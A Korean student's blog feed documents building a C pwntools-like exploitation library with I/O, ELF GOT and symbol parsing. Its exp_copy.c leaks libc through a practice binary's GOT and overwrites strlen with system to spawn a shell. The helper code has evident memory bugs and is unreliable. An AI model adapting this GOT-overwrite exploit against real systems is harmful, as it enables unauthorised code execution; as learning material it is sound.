https://youngsouk-hack.tistory.com/ ko Thu, 28 May 2026 14:15:15 +0900 TISTORY 100 youngsouk https://t1.daumcdn.net/cfile/tistory/9954EA3D5C55467F23 https://youngsouk-hack.tistory.com https://youngsouk-hack.tistory.com/154 <p data-ke-size="size16">헤더파일과 소스코드를 오브젝트 파일로 일일이 컴파일을 해주어야 하는 불편함이 있어서 MakeFile이라는 것을 만들어서 간편하게 해보았다.</p> <pre id="code_1623717948660" class="c++ arduino" data-ke-language="c++" data-ke-type="codeblock"><code>CC = "gcc" CFLAGS = "-W" TARGET = exp $(TARGET) : pwnc.o exp.o $(CC) $(CFLAGS) -o $(TARGET) pwnc.o exp.o pwnc.o : pwnc.c $(CC) $(CFLAGS) -c -o pwnc.o pwnc.c exp.o : exp.c $(CC) $(CFLAGS) -c -o exp.o exp.c clean : rm pwnc.o exp.o exp</code></pre> <p data-ke-size="size16">이런식으로 makefile을 구성하여 이제는 make명령어만 입력하면 자동으로 컴파일 되게 해놓았다.</p> <p data-ke-size="size16">실제로 컴파일한 뒤 실행하는 모습은 이렇다.&nbsp;</p> <p><figure class="imageblock alignCenter" data-origin-width="1572" data-origin-height="1636" data-ke-mobilestyle="widthOrigin"><span data-url="https://blog.kakaocdn.net/dn/boN8UH/btq7icfTbef/RZnV0C2OZnbzWWmL82cmLk/img.png" data-phocus="https://blog.kakaocdn.net/dn/boN8UH/btq7icfTbef/RZnV0C2OZnbzWWmL82cmLk/img.png"><img src="https://blog.kakaocdn.net/dn/boN8UH/btq7icfTbef/RZnV0C2OZnbzWWmL82cmLk/img.png" srcset="https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FboN8UH%2Fbtq7icfTbef%2FRZnV0C2OZnbzWWmL82cmLk%2Fimg.png" data-origin-width="1572" data-origin-height="1636" data-ke-mobilestyle="widthOrigin" onerror="this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';"/></span></figure> </p> <p data-ke-size="size16">이런식으로 쉘을 성공적으로 획득한 것을 알 수 있다.</p> 1인 1프로젝트 youngsouk https://youngsouk-hack.tistory.com/154 https://youngsouk-hack.tistory.com/154#entry154comment Tue, 15 Jun 2021 09:51:02 +0900 https://youngsouk-hack.tistory.com/153 <p data-ke-size="size16">최근 시험기간이라서 많이 코딩하지는 못했지만 우여곡절 끝에 전체적인 함수들과 구조체를 완성했고 이런 함수와 구조체를 별도의 헤더파일로 구성하면 끝이다.</p> <p data-ke-size="size16"><a href="https://www.joinc.co.kr/w/Site/C/Documents/CprogramingForLinuxEnv/Ch12_module" target="_blank" rel="noopener">https://www.joinc.co.kr/w/Site/C/Documents/CprogramingForLinuxEnv/Ch12_module</a></p> <figure id="og_1623717062825" contenteditable="false" data-ke-type="opengraph" data-ke-align="alignCenter" data-og-type="website" data-og-title="리눅스 환경에서의 C 프로그래밍 - 12장 모듈과 라이브러리" data-og-description="공유라이브러리와 정적라이브러리의 장단점" data-og-host="www.joinc.co.kr" data-og-source-url="https://www.joinc.co.kr/w/Site/C/Documents/CprogramingForLinuxEnv/Ch12_module" data-og-url="https://www.joinc.co.kr/w/Site/C/Documents/CprogramingForLinuxEnv/Ch12_module" data-og-image=""><a href="https://www.joinc.co.kr/w/Site/C/Documents/CprogramingForLinuxEnv/Ch12_module" target="_blank" rel="noopener" data-source-url="https://www.joinc.co.kr/w/Site/C/Documents/CprogramingForLinuxEnv/Ch12_module"> <div class="og-image" style="background-image: url();">&nbsp;</div> <div class="og-text"> <p class="og-title" data-ke-size="size16">리눅스 환경에서의 C 프로그래밍 - 12장 모듈과 라이브러리</p> <p class="og-desc" data-ke-size="size16">공유라이브러리와 정적라이브러리의 장단점</p> <p class="og-host" data-ke-size="size16">www.joinc.co.kr</p> </div> </a></figure> <p data-ke-size="size16">GCC를 이용해서 헤더 파일들을 컴파일 한 뒤에 오브젝트 파일들을 링크하는 방식으로 해야 하는데 나는 그냥 헤더파일을 인클루드한 파일만 컴파일 하려해서 오류가 많이 발생했다. 그래서 위에 글을 참조해서 헤더파일 분리까지 완성했다. 또한 세이프 인클루드까지 해놓았다.</p> <p data-ke-size="size16">&nbsp;</p> <p data-ke-size="size16">최종적인 소스코드는 이렇게 된다.</p> <p data-ke-size="size16">pwn.c</p> <pre id="code_1623717148240" class="c++ arduino" data-ke-language="c++" data-ke-type="codeblock"><code>#include "pwnc.h" #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;unistd.h&gt; #include &lt;fcntl.h&gt; #include &lt;string.h&gt; #include &lt;malloc.h&gt; #include &lt;elf.h&gt; #include &lt;sys/socket.h&gt; #include &lt;netinet/in.h&gt; #include &lt;arpa/inet.h&gt; #define INPUT_LIMIT 0x10000 #define RECV_LIMIT 0x10000 #define REMOTE 1 #define LOCAL 0 // #define MODE LOCAL int fd[2][2]; // 프로세스 통신을 위한 fd[0] : 입력, fd[1] : 출력 /* typedef struct Section{ Elf64_Half SectionCnt; Elf64_Half SectionStringIndex; char * SectionName; Elf64_Shdr * SectionHeader; }Section; typedef struct got{ char * name; unsigned long long addr; } GOT; typedef struct sym{ char * name; unsigned long long value; }SYM; typedef struct elfinfo{ int fd; char * filename; Section section; GOT * got; SYM * sym; }ELFInfo; */ unsigned long long * p64(unsigned long long value){ unsigned long long * tmp = malloc(sizeof(unsigned long long) + 1); *(tmp) = value; *(char *)(tmp + sizeof(unsigned long long)) = '\0'; return tmp; } unsigned int * p32(unsigned int value){ unsigned int * tmp = malloc(sizeof(unsigned int) + 1); *(tmp) = value; *(char *)(tmp + sizeof(unsigned int)) = '\0'; return tmp; } void remote(char * ip, int port){ int SocketNum = socket(PF_INET, SOCK_STREAM, 0); struct sockaddr_in server_addr; if(SocketNum &lt; 0){ printf("Socket 오류"); exit(0); } memset( &amp;server_addr, 0, sizeof( server_addr)); server_addr.sin_family = AF_INET; server_addr.sin_port = htons(port); server_addr.sin_addr.s_addr= inet_addr(ip); if (inet_pton(AF_INET, "127.0.0.1", &amp;server_addr.sin_addr) != 1) { printf("inte_pton"); exit(0); } if( -1 == connect( SocketNum, (struct sockaddr*)&amp;server_addr, sizeof( server_addr) ) ) { printf( "접속 실패\n"); exit( 1); } fd[1][0] = SocketNum; fd[0][1] = SocketNum; printf("Set Connnection with %s:%d", ip, port); } int process(char * path){ pid_t pid; if(pipe(fd[0]) &lt; 0){ printf("pipe error"); exit(0); } if(pipe(fd[1]) &lt; 0){ printf("pipe error"); exit(0); } switch(pid = fork()){ case -1: printf("fork error"); return -1; case 0: close(fd[1][0]); close(fd[0][1]); close(1); close(0); dup2(fd[1][1], STDOUT_FILENO); dup2(fd[0][0], STDIN_FILENO); execl(path, path, NULL); } close(fd[1][1]); close(fd[0][0]); char buf[1000]; printf("[*] Starting local process... pid is %d\n", pid); return 0; } int Recvuntil(char * str, int print){ int i = 0, len = strlen(str), cnt = 0; // i : index, len : source length, cnt : total recv amount char * tmp = (char * ) calloc(1, len); while(1){ read(fd[1][0], tmp + i, 1); cnt++; if(print == 1) write(1, tmp + i, 1); if(*(tmp + i) == *(str + i)) i++; else i = 0; if(i == len - 1){ free(tmp); return cnt; }; } } char * Recv(int cnt, int print){ char * tmp; int len; tmp = (char * ) calloc(1, cnt + 1); // cnt + 1 : NULL 문자 때문에 len = read(fd[1][0], tmp, cnt); if(print == 1) printf("%s\n", tmp); return tmp; } int Send(char * str){ return write(fd[0][1], str, strlen(str)); } int Send32(char * str){ // 0 값을 보내기 위한 함수. strlen("\x00") = 0이기 때문 return write(fd[0][1], str, 4); } int Send64(char * str){ return write(fd[0][1], str, 8); } int Sendline(char * str){ int len; char * tmp = (char * ) calloc(1, strlen(str) + 2); // strlen(str) + 2 : '\n' 개행 문자 , NULL 때문에 strcpy(tmp, str); strcat(tmp, "\n"); len = Send(tmp); free(tmp); return len; } void interactive(){ char * input = (char * ) malloc(INPUT_LIMIT); // 사용자의 입력 저장. 최대 크기 : INPUT_LIMIT 매크로 상수(기본 : 0x1000) printf("Switching to interactive mode\n"); while(1){ Recv(RECV_LIMIT, 1); // 입력받을 최대크기 : RECV_LIMIT 매크로 상수(기본 : 0x1000) write(1, "$", 1); *(input + read(0, input, INPUT_LIMIT)) = '\0'; Send(input); } } Section findSectionHeader(int fd){ Section section; Elf64_Off * SectionHeader = malloc(sizeof(Elf64_Off)); Elf64_Half * SectionCnt = malloc(sizeof(Elf64_Half)); Elf64_Half * SectionStringIndex = malloc(sizeof(Elf64_Half)); Elf64_Shdr * SectionInformation; char * SectionName; //ELF 헤더 lseek(fd, offsetof(Elf64_Ehdr, e_shnum), SEEK_SET); read(fd, SectionCnt, sizeof(Elf64_Half)); section.SectionCnt = *SectionCnt; SectionInformation = malloc(*SectionCnt * sizeof(Elf64_Shdr)); section.SectionHeader = SectionInformation; lseek(fd, offsetof(Elf64_Ehdr, e_shoff), SEEK_SET); read(fd, SectionHeader, sizeof(Elf64_Off)); lseek(fd, offsetof(Elf64_Ehdr, e_shstrndx), SEEK_SET); read(fd, SectionStringIndex, sizeof(Elf64_Half)); section.SectionStringIndex = *SectionStringIndex; //색션 정보 얻기 lseek(fd, *SectionHeader, SEEK_SET); read(fd, SectionInformation, sizeof(Elf64_Shdr) * *SectionCnt); Elf64_Shdr * SectionString = SectionInformation + *SectionStringIndex; lseek(fd, SectionString -&gt; sh_offset, SEEK_SET); SectionName = malloc(SectionString -&gt; sh_size); read(fd, SectionName, SectionString -&gt; sh_size); section.SectionName = SectionName; return section; } Elf64_Shdr * getSectionInfo(Section section, char * name){ for(int i = 0; i &lt; section.SectionCnt; i++){ if(!strcmp(section.SectionName + ((section.SectionHeader + i) -&gt; sh_name),name)) return section.SectionHeader + i; } return 0; } GOT * findGOTInfo(int fd, Section section){ int i; Elf64_Shdr * PLTRelSection = getSectionInfo(section, ".rela.plt"); if(PLTRelSection == 0) return 0; Elf64_Shdr * dynsymSection = getSectionInfo(section, ".dynsym"); Elf64_Shdr * dynstrSection = getSectionInfo(section, ".dynstr"); Elf64_Rela * PLTRel = malloc(PLTRelSection -&gt; sh_size); Elf64_Sym * dynsym = malloc(dynsymSection -&gt; sh_size); char * dynstr = malloc(dynstrSection -&gt; sh_size); int SymOffset; // got 주소 얻는데 사용 int NameOffset; int FunctionCnt = (PLTRelSection -&gt; sh_size) / sizeof(Elf64_Rela); GOT * got = malloc(sizeof(GOT) * (FunctionCnt + 1)); //FunctionCnt + 1 NULL 구조체 추가 lseek(fd, PLTRelSection -&gt; sh_offset, SEEK_SET); read(fd, PLTRel, PLTRelSection -&gt; sh_size); lseek(fd, dynsymSection -&gt; sh_offset, SEEK_SET); read(fd, dynsym, dynsymSection -&gt; sh_size); lseek(fd, dynstrSection -&gt; sh_offset, SEEK_SET); read(fd, dynstr, dynstrSection -&gt; sh_size); int idx = 0; for(i = 0; i &lt; FunctionCnt; i++){ if((PLTRel + i) -&gt; r_offset != 0){ (got + idx) -&gt; addr = (PLTRel + i) -&gt; r_offset; SymOffset = ELF64_R_SYM((PLTRel + i) -&gt; r_info); NameOffset = (dynsym + SymOffset) -&gt; st_name; (got + idx) -&gt; name = dynstr + NameOffset; idx++; } } (got + i) -&gt; addr = 0; (got + i) -&gt; name = 0; return got; } unsigned long long getGOT(GOT * got, char * target){ if(__glibc_unlikely(got == 0)) return 0; for(int i = 0; (got + i) -&gt; addr != 0 || (got + i) -&gt; name != 0; i++){ if(!(strcmp((got + i) -&gt; name, target))) return (got + i) -&gt; addr; } return 0; } SYM * findSYM(int fd, Section section){ int i; Elf64_Shdr * dynsymSection = getSectionInfo(section, ".dynsym"); Elf64_Shdr * dynstrSection = getSectionInfo(section, ".dynstr"); Elf64_Sym * dynsym = malloc(dynsymSection -&gt; sh_size); char * dynstr = malloc(dynstrSection -&gt; sh_size); int SymbolCnt = (dynsymSection -&gt; sh_size) / sizeof(Elf64_Sym); SYM * symbol = malloc(sizeof(SYM) * (SymbolCnt + 1)); //SymbolCnt + 1 : NULL 구조체 추가 char * t; int NameOffset; lseek(fd, dynsymSection -&gt; sh_offset, SEEK_SET); read(fd, dynsym, dynsymSection -&gt; sh_size); lseek(fd, dynstrSection -&gt; sh_offset, SEEK_SET); read(fd, dynstr, dynstrSection -&gt; sh_size); int idx; for(i = 0; i &lt; SymbolCnt; i++){ if(((dynsym + i) -&gt; st_value) != 0){ (symbol + idx) -&gt; value = (dynsym + i) -&gt; st_value; NameOffset = (dynsym + i) -&gt; st_name; (symbol + idx) -&gt; name = dynstr + NameOffset; idx++; } } (symbol + i) -&gt; value = 0; (symbol + i) -&gt; name = 0; return symbol; } unsigned long long getSYM(SYM * sym, char * target){ if(__glibc_unlikely(sym == 0)) return 0; for(int i = 0; (sym + i) -&gt; value != 0 || (sym + i) -&gt; name != 0; i++){ if(!(strcmp((sym + i) -&gt; name, target)))return (sym + i) -&gt; value; } return 0; } ELFInfo ELF(char * path){ int fd = open(path, O_RDONLY); ELFInfo elf; elf.fd = fd; elf.filename = path; elf.section = findSectionHeader(fd); elf.got = findGOTInfo(fd, elf.section); elf.sym = findSYM(fd, elf.section); return elf; } ELFInfo getLibcELF(ELFInfo elf){ char * LibcPath = malloc(1024); char * command = malloc(1024); int fd = open(".result.txt", O_RDWR | O_CREAT | O_TRUNC, 0644); ELFInfo LibcELF; char tmp; int i; sprintf(command, "ldd %s &gt;&gt; .result.txt", elf.filename); if(system(command) == -1){ printf("system() error"); exit(0); } for(int i = 0; i &lt; 2; i++){ while(1){ read(fd, &amp;tmp, 1); if(tmp == '&gt;') break; } } for(int i = 0; i&lt; 2; i++){ i = 0; while(1){ read(fd, &amp;tmp, 1); if(tmp == ' ') break; *(LibcPath + i) = tmp; i++; } } LibcELF = ELF(LibcPath); return LibcELF; } void hexdump(void * target, int size){ unsigned long long * t1; unsigned long long mask; unsigned long long tmp; for(long unsigned int i = 0; i &lt; size / 16 + 1; i++){ mask = 0xff; t1 = (unsigned long long *)target + i; printf("%08lx ", i); for(int j = 0; j &lt; 16; j++){ if(j % 4 == 0)printf(" "); tmp = *t1 &amp; mask; printf("%02llx ", tmp &gt;&gt; (8 * j)); mask = mask &lt;&lt; 8; } printf(" "); mask = 0xff; t1 = (unsigned long long *)target + i; for(int j = 0; j &lt; 16; j++){ if(j % 4 == 0)printf("|"); tmp = *t1 &amp; mask; printf("%c", (char) (tmp &gt;&gt; (8 * j))); mask = mask &lt;&lt; 8; } printf("\n"); } } /* void io32(int a, int print){ char * tmp = (char * )p32(a); Recvuntil("&gt; ", print); Send32(tmp); free(tmp); } void io64(unsigned long long a, int print){ char * tmp = (char * ) p64(a); Recvuntil("&gt; ", print); Send64(tmp); free(tmp); } void arb_write(unsigned long long addr, unsigned long long value, int print){ //io32(0, print); Recvuntil("&gt;", print); Send32((char *)p32(0)); io64(addr, print); io64(value, print); io32(8, print); Recvuntil("OK\n", print); } unsigned long long * arb_read(unsigned long long addr, unsigned long long size, int print){ unsigned long long * ret; io32(1, print); io64(addr, print); io64(size, print); Recv(1, print); // ' ' 때문에 1바이트를 먼저 받아준다. ret = (unsigned long long *)Recv(8, print); Recvuntil("OK\n", print); printf("\n"); hexdump(ret, 16); printf("\n"); return ret; } void dummy(char * s, int print){ io32(2, print); Recvuntil("&gt; ", print); Sendline(s); Recvuntil("OK\n", print); } int main(){ setvbuf(stdout, NULL, _IONBF, 0); // printf 함수 사용시 버퍼링 때문에 잘 출력이 안되는 경우가 있었음. unsigned long long LibcAddr; ELFInfo elf = ELF("./prob"); // ELFInfo libc = getLibcELF(elf); ELFInfo libc = ELF("/lib/x86_64-linux-gnu/libc.so.6"); unsigned long long * WriteAddr; if(MODE == REMOTE) remote("localhost", 9000); else if(MODE == LOCAL) process("./prob"); else { printf("set mode LOCAL or REMOTE"); exit(0); } dummy("a", 0); // 바이너리의 dummy함수는 strlen 함수를 사용합니다. 따라서 dummy함수를 한번이라도 실행한다면 strlen 함수의 got에 strlen 함수의 실제주소가 들어가게 된다. WriteAddr = arb_read(getGOT(elf.got, "write"), 8, 0); LibcAddr = *WriteAddr - getSYM(libc.sym, "write"); printf("[*] Libc address = %p\n", (void *)LibcAddr); arb_write(getGOT(elf.got, "strlen"), LibcAddr + getSYM(libc.sym, "system"), 0); io32(2, 0); Recvuntil("&gt; ", 0); Sendline("/bin/sh"); interactive(); } */ </code></pre> <p data-ke-size="size16">pwn.h</p> <pre id="code_1623717168975" class="c++ arduino" data-ke-language="c++" data-ke-type="codeblock"><code>#ifndef __PWNC__H # define __PWNC__H #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;unistd.h&gt; #include &lt;fcntl.h&gt; #include &lt;string.h&gt; #include &lt;malloc.h&gt; #include &lt;elf.h&gt; #include &lt;sys/socket.h&gt; #include &lt;netinet/in.h&gt; #include &lt;arpa/inet.h&gt; #define INPUT_LIMIT 0x10000 #define RECV_LIMIT 0x10000 #define REMOTE 1 #define LOCAL 0 extern int fd[2][2]; // 프로세스 통신을 위한 fd[0] : 입력, fd[1] : 출력 typedef struct Section{ Elf64_Half SectionCnt; Elf64_Half SectionStringIndex; char * SectionName; Elf64_Shdr * SectionHeader; }Section; typedef struct got{ char * name; unsigned long long addr; } GOT; typedef struct sym{ char * name; unsigned long long value; }SYM; typedef struct elfinfo{ int fd; char * filename; Section section; GOT * got; SYM * sym; }ELFInfo; extern unsigned long long * p64(unsigned long long value); extern unsigned int * p32(unsigned int value); extern void remote(char * ip, int port); extern int process(char * path); extern int Recvuntil(char * str, int print); extern char * Recv(int cnt, int print); extern int Send(char * str); extern int Send32(char * str); extern int Send64(char * str); extern int Sendline(char * str); extern void interactive(void); extern Section findSectionHeader(int fd); extern Elf64_Shdr * getSectionInfo(Section section, char * name); extern GOT * findGOTInfo(int fd, Section section); extern unsigned long long getGOT(GOT * got, char * target); extern SYM * findSYM(int fd, Section section); extern unsigned long long getSYM(SYM * sym, char * target); extern ELFInfo ELF(char * path); extern ELFInfo getLibcELF(ELFInfo elf); extern void hexdump(void * target, int size); #endif </code></pre> <p data-ke-size="size16">exp_copy.c</p> <pre id="code_1623717181853" class="c++ arduino" data-ke-language="c++" data-ke-type="codeblock"><code>#include "pwnc.h" #define MODE LOCAL void io32(int a, int print){ char * tmp = (char * )p32(a); Recvuntil("&gt; ", print); Send32(tmp); free(tmp); } void io64(unsigned long long a, int print){ char * tmp = (char * ) p64(a); Recvuntil("&gt; ", print); Send64(tmp); free(tmp); } void arb_write(unsigned long long addr, unsigned long long value, int print){ //io32(0, print); Recvuntil("&gt;", print); Send32((char *)p32(0)); io64(addr, print); io64(value, print); io32(8, print); Recvuntil("OK\n", print); } unsigned long long * arb_read(unsigned long long addr, unsigned long long size, int print){ unsigned long long * ret; io32(1, print); io64(addr, print); io64(size, print); Recv(1, print); // ' ' 때문에 1바이트를 먼저 받아준다. ret = (unsigned long long *)Recv(8, print); Recvuntil("OK\n", print); printf("\n"); hexdump(ret, 16); printf("\n"); return ret; } void dummy(char * s, int print){ io32(2, print); Recvuntil("&gt; ", print); Sendline(s); Recvuntil("OK\n", print); } int main(){ setvbuf(stdout, NULL, _IONBF, 0); // printf 함수 사용시 버퍼링 때문에 잘 출력이 안되는 경우가 있었음. unsigned long long LibcAddr; ELFInfo elf = ELF("./prob"); // ELFInfo libc = getLibcELF(elf); ELFInfo libc = ELF("/lib/x86_64-linux-gnu/libc.so.6"); unsigned long long * WriteAddr; if(MODE == REMOTE) remote("localhost", 9000); else if(MODE == LOCAL) process("./prob"); else { printf("set mode LOCAL or REMOTE"); exit(0); } dummy("a", 0); // 바이너리의 dummy함수는 strlen 함수를 사용합니다. 따라서 dummy함수를 한번이라도 실행한다면 strlen 함수의 got에 strlen 함수의 실제주소가 들어가게 된다. WriteAddr = arb_read(getGOT(elf.got, "write"), 8, 0); LibcAddr = *WriteAddr - getSYM(libc.sym, "write"); printf("[*] Libc address = %p\n", (void *)LibcAddr); arb_write(getGOT(elf.got, "strlen"), LibcAddr + getSYM(libc.sym, "system"), 0); io32(2, 0); Recvuntil("&gt; ", 0); Sendline("/bin/sh"); interactive(); } </code></pre> 1인 1프로젝트 youngsouk https://youngsouk-hack.tistory.com/153 https://youngsouk-hack.tistory.com/153#entry153comment Mon, 14 Jun 2021 15:40:49 +0900 https://youngsouk-hack.tistory.com/152 <p data-ke-size="size16">interactive함수와 hexdump함수를 구현했다. 이 과정에서 interactive함수가 잘 동작하지 않아 gdb로 디버깅하는데 많이 애를 먹었다. 해킹할 프로그램도 디버깅해보면서 공격방법을 구상하였는데 hexdump()함수를 완성하여서 디버깅하기에 수월했다.</p> <pre id="code_1623652681878" class="c++ arduino" data-ke-language="c++" data-ke-type="codeblock"><code>void interactive(){ char * input = (char * ) malloc(INPUT_LIMIT); // 사용자의 입력 저장. 최대 크기 : INPUT_LIMIT 매크로 상수(기본 : 0x1000) printf("Switching to interactive mode\n"); while(1){ Recv(RECV_LIMIT, 1); // 입력받을 최대크기 : RECV_LIMIT 매크로 상수(기본 : 0x1000) write(1, "$", 1); *(input + read(0, input, INPUT_LIMIT)) = '\0'; Send(input); } } void hexdump(void * target, int size){ unsigned long long * t1; unsigned long long mask; unsigned long long tmp; for(long unsigned int i = 0; i &lt; size / 16 + 1; i++){ mask = 0xff; t1 = (unsigned long long *)target + i; printf("%08lx ", i); for(int j = 0; j &lt; 16; j++){ if(j % 4 == 0)printf(" "); tmp = *t1 &amp; mask; printf("%02llx ", tmp &gt;&gt; (8 * j)); mask = mask &lt;&lt; 8; } printf(" "); mask = 0xff; t1 = (unsigned long long *)target + i; for(int j = 0; j &lt; 16; j++){ if(j % 4 == 0)printf("|"); tmp = *t1 &amp; mask; printf("%c", (char) (tmp &gt;&gt; (8 * j))); mask = mask &lt;&lt; 8; } printf("\n"); } } </code></pre> 1인 1프로젝트 youngsouk https://youngsouk-hack.tistory.com/152 https://youngsouk-hack.tistory.com/152#entry152comment Tue, 8 Jun 2021 09:45:04 +0900 https://youngsouk-hack.tistory.com/151 <p data-ke-size="size16"><a href="https://youngsouk-hack.tistory.com/150" target="_blank" rel="noopener">2021.05.11 - [1인 1프로젝트] - 코딩 중</a></p> <figure id="og_1623652504115" contenteditable="false" data-ke-type="opengraph" data-ke-align="alignCenter" data-og-type="article" data-og-title="코딩 중" data-og-description="데이터의 패킹&amp;언패킹 함수 구현과 process함수의 동작방식을 자세하게 구상해보았다. 내가 구현한 패킹&amp;언패킹 함수는 이렇다. unsigned long long * p64(unsigned long long value){ unsigned long long * tmp =.." data-og-host="youngsouk-hack.tistory.com" data-og-source-url="https://youngsouk-hack.tistory.com/150" data-og-url="https://youngsouk-hack.tistory.com/150" data-og-image="https://scrap.kakaocdn.net/dn/TBYP6/hyKzavQZHC/mx4Az2pCzEzuv1Frx7Rpwk/img.png?width=800&amp;height=800&amp;face=0_0_800_800,https://scrap.kakaocdn.net/dn/nDs4z/hyKxB9FjVi/kKxEkX30jGoeKWnhQpszCk/img.png?width=800&amp;height=800&amp;face=0_0_800_800,https://scrap.kakaocdn.net/dn/seMuN/hyKyVSYhnV/juv2n5KbJ1jTDhBhvvQSxK/img.jpg?width=2161&amp;height=1960&amp;face=0_0_2161_1960"><a href="https://youngsouk-hack.tistory.com/150" target="_blank" rel="noopener" data-source-url="https://youngsouk-hack.tistory.com/150"> <div class="og-image" style="background-image: url('https://scrap.kakaocdn.net/dn/TBYP6/hyKzavQZHC/mx4Az2pCzEzuv1Frx7Rpwk/img.png?width=800&amp;height=800&amp;face=0_0_800_800,https://scrap.kakaocdn.net/dn/nDs4z/hyKxB9FjVi/kKxEkX30jGoeKWnhQpszCk/img.png?width=800&amp;height=800&amp;face=0_0_800_800,https://scrap.kakaocdn.net/dn/seMuN/hyKyVSYhnV/juv2n5KbJ1jTDhBhvvQSxK/img.jpg?width=2161&amp;height=1960&amp;face=0_0_2161_1960');">&nbsp;</div> <div class="og-text"> <p class="og-title" data-ke-size="size16">코딩 중</p> <p class="og-desc" data-ke-size="size16">데이터의 패킹&amp;언패킹 함수 구현과 process함수의 동작방식을 자세하게 구상해보았다. 내가 구현한 패킹&amp;언패킹 함수는 이렇다. unsigned long long * p64(unsigned long long value){ unsigned long long * tmp =..</p> <p class="og-host" data-ke-size="size16">youngsouk-hack.tistory.com</p> </div> </a></figure> <p data-ke-size="size16">이전의 글에 이어 Process함수와 그 함수를 바탕으로 recv, send함수를 구현했다.</p> <pre id="code_1623652596972" class="c++ arduino" data-ke-language="c++" data-ke-type="codeblock"><code>void remote(char * ip, int port){ int SocketNum = socket(PF_INET, SOCK_STREAM, 0); struct sockaddr_in server_addr; if(SocketNum &lt; 0){ printf("Socket 오류"); exit(0); } memset( &amp;server_addr, 0, sizeof( server_addr)); server_addr.sin_family = AF_INET; server_addr.sin_port = htons(port); server_addr.sin_addr.s_addr= inet_addr(ip); if (inet_pton(AF_INET, "127.0.0.1", &amp;server_addr.sin_addr) != 1) { printf("inte_pton"); exit(0); } if( -1 == connect( SocketNum, (struct sockaddr*)&amp;server_addr, sizeof( server_addr) ) ) { printf( "접속 실패\n"); exit( 1); } fd[1][0] = SocketNum; fd[0][1] = SocketNum; printf("Set Connnection with %s:%d", ip, port); } int process(char * path){ pid_t pid; if(pipe(fd[0]) &lt; 0){ printf("pipe error"); exit(0); } if(pipe(fd[1]) &lt; 0){ printf("pipe error"); exit(0); } switch(pid = fork()){ case -1: printf("fork error"); return -1; case 0: close(fd[1][0]); close(fd[0][1]); close(1); close(0); dup2(fd[1][1], STDOUT_FILENO); dup2(fd[0][0], STDIN_FILENO); execl(path, path, NULL); } close(fd[1][1]); close(fd[0][0]); char buf[1000]; printf("[*] Starting local process... pid is %d\n", pid); return 0; } int Recvuntil(char * str, int print){ int i = 0, len = strlen(str), cnt = 0; // i : index, len : source length, cnt : total recv amount char * tmp = (char * ) calloc(1, len); while(1){ read(fd[1][0], tmp + i, 1); cnt++; if(print == 1) write(1, tmp + i, 1); if(*(tmp + i) == *(str + i)) i++; else i = 0; if(i == len - 1){ free(tmp); return cnt; }; } } char * Recv(int cnt, int print){ char * tmp; int len; tmp = (char * ) calloc(1, cnt + 1); // cnt + 1 : NULL 문자 때문에 len = read(fd[1][0], tmp, cnt); if(print == 1) printf("%s\n", tmp); return tmp; } int Send(char * str){ return write(fd[0][1], str, strlen(str)); } int Send32(char * str){ // 0 값을 보내기 위한 함수. strlen("\x00") = 0이기 때문 return write(fd[0][1], str, 4); } int Send64(char * str){ return write(fd[0][1], str, 8); } int Sendline(char * str){ int len; char * tmp = (char * ) calloc(1, strlen(str) + 2); // strlen(str) + 2 : '\n' 개행 문자 , NULL 때문에 strcpy(tmp, str); strcat(tmp, "\n"); len = Send(tmp); free(tmp); return len; }</code></pre> 1인 1프로젝트 youngsouk https://youngsouk-hack.tistory.com/151 https://youngsouk-hack.tistory.com/151#entry151comment Tue, 25 May 2021 10:44:49 +0900 https://youngsouk-hack.tistory.com/150 <p style="text-align: left;" data-ke-size="size16">데이터의 패킹&amp;언패킹 함수 구현과 process함수의 동작방식을 자세하게 구상해보았다.</p> <p style="text-align: left;" data-ke-size="size16">내가 구현한 패킹&amp;언패킹 함수는 이렇다.</p> <pre id="code_1623652077480" class="c++ arduino" data-ke-language="c++" data-ke-type="codeblock"><code>unsigned long long * p64(unsigned long long value){ unsigned long long * tmp = malloc(sizeof(unsigned long long) + 1); *(tmp) = value; *(char *)(tmp + sizeof(unsigned long long)) = '\0'; return tmp; } unsigned int * p32(unsigned int value){ unsigned int * tmp = malloc(sizeof(unsigned int) + 1); *(tmp) = value; *(char *)(tmp + sizeof(unsigned int)) = '\0'; return tmp; } </code></pre> <p style="text-align: left;" data-ke-size="size16">&nbsp;</p> <p style="text-align: left;" data-ke-size="size16">Process함수의 동작방식은</p> <p style="text-align: left;" data-ke-size="size16">1. pipe함수를 2번 사용하여 읽기&amp;쓰기용 파이프를 만든다</p> <p style="text-align: left;" data-ke-size="size16">2. fork()를 통해 자식 프로세스를 실행한다.</p> <p style="text-align: left;" data-ke-size="size16">3. 자식프로세스와 &amp; 부모 프로세스는 자신에게 불필요한 파이프를 닫는다.</p> <p style="text-align: left;" data-ke-size="size16">4. 자식프로세스에서 execl()함수를 통해 해킹 대상 프로그램을 실행한다.</p> <p style="text-align: left;" data-ke-size="size16">5. 자식프로세스에서 자신의 표준 입력 &amp; 쓰기를 닫고 1번과정에서 생성한 파이프로 표준 입력&amp;쓰기를 재설정한다.</p> <p style="text-align: left;" data-ke-size="size16">이정도로 구상하고 있다.</p> 1인 1프로젝트 youngsouk https://youngsouk-hack.tistory.com/150 https://youngsouk-hack.tistory.com/150#entry150comment Tue, 11 May 2021 09:40:54 +0900 https://youngsouk-hack.tistory.com/149 <p data-ke-size="size16"><a href="https://youngsouk-hack.tistory.com/149" target="_blank" rel="noopener">2021.05.10 - [1인 1프로젝트] - 코딩 시작</a></p> <figure id="og_1623651904250" contenteditable="false" data-ke-type="opengraph" data-ke-align="alignCenter" data-og-type="website" data-og-title="코딩 시작" data-og-description="" data-og-host="youngsouk-hack.tistory.com" data-og-source-url="https://youngsouk-hack.tistory.com/149" data-og-url="https://youngsouk-hack.tistory.com/149" data-og-image="https://scrap.kakaocdn.net/dn/KCQAI/hyKxIHILRj/mYdCRaJVqaFURkL9Go3tx0/img.jpg?width=2161&amp;height=1960&amp;face=0_0_2161_1960"><a href="https://youngsouk-hack.tistory.com/149" target="_blank" rel="noopener" data-source-url="https://youngsouk-hack.tistory.com/149"> <div class="og-image" style="background-image: 